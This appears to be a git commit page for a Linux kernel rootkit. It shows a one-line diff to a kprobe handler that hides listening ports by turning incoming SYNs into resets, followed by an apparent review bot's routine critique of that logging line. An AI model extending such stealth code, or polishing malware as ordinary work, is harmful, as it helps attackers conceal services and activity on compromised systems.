linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit e6fbb887c53a917a1a3913d80181f1a94f188ec7
parent 3842e8e2d75b76867c6c05fb8f81e2f40c77a340
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 10 Jan 2021 19:40:24 +0100

adds blocked handshake request debug info

Diffstat:
M src/packhide.c | 1 +
1 file changed, 1 insertion(+), 0 deletions(-)

diff --git a/src/packhide.c b/src/packhide.c @@ -207,6 +207,7 @@ g7_packet_rcv(struct kprobe *kp, struct pt_regs *pt_regs) check_port: if (list_contains_lport(&hidden_lports, src_port)) if (tcphdr->syn) { + DEBUG_NOTICE("[g7] blocked handshake request on port %d\n", src_port); tcphdr->syn = 0; tcphdr->ack = 0; tcphdr->rst = 1;
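
Review bot: the added DEBUG_NOTICE line inside the `if (tcphdr->syn)` branch prints `src_port` with `%d`, but the hunk shows neither the variable's type nor its byte order. If `src_port` is an unsigned 16-bit value, `%u` is the matching specifier, and the value should be in host byte order at this point so that the logged number is the same one `list_contains_lport(&hidden_lports, src_port)` compared against. The message is also emitted once per matching SYN from inside the `g7_packet_rcv` kprobe handler with no visible rate limit, so a burst of SYNs to a listed port produces one log line per packet; a rate-limited variant of the macro would bound that. Finally, "on port" does not say whether this is the source or the local port, while the variable is named `src_port` and the list is `hidden_lports`; wording the message to match one of them would make the debug output unambiguous.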